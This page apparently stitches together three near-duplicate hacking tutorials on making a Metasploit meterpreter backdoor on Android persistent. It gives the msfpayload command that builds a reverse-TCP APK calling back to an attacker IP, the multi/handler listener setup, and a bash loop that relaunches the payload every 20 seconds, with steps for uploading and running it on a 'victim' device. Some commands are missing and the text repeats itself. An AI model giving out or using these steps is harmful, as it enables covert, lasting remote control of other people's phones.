Kali linux backdoor android

Create a Persistent BackDoor in Android Using Kali Linux

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.

I’ll be hacking on WAN, using a VM.

• Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

• Now, lets set-up a Listener:
• msfconsole
• use exploit/multi/handler
• set payload android/meterpreter/reverse_tcp
• set LHOST 192.168.0.4
• exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up…

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh(The file extension .sh is important!)

——————————————————————————————————–
#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
——————————————————————————————————–
(Don’t copy these lines “—–” also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)

Move/Copy this to the Home/Root folder of KALI.

——————————————————————————————————–
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON’T WORK /!\
..I guess, you will have to write it on your own.. (Don’t ask me why..)
Code:
——————————————————————————————————–
#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
——————————————————————————————————–
There is a ‘space’ between ‘while’ and ‘:’
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even afterReboot!
To do this, navigate to the directory using the following commands:

Now you should be in the ROOT directory, you can check by typing:

Check again by typing:

Again change directory:

• cd init.d
• ls

Time to Upload the Shell Script:

Do this by typing:

• upload anything.sh

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:

• cd /
• cd /sdcard/Download
• ls
• upload anything.sh

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system’s shell by typing:

Now, navigate to the location of the script:

• cd /
• cd /sdcard/Download
• ls

Now its time for EXECUTION. Type:

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don’t worry the script is still running)Reboot to eliminate the script or use Task Killer

Step 5: Testing…

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

• The persistence of the backdoor will only remain until a reboot of the android system.
• If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
• Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
• If the Victim’s Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

Источник

Persistent Backdoor in Android using Kali Linux with a Shell script

Hello guys, today we’re going to show you that how you can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

Previously we discussed two methods through which you can hack any android device:

You can use any of the method above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to less permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the method, there are alot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the method and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that you need to get into root directory of android device by typing “cd /” in terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in same terminal.

Now all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in above screen.

Источник

Persistent Backdoor In Android Using Kali Linux With A Shell Script

Hello guys, today we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to fewer permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the methods, there are a lot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into the same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In the above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in the same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Источник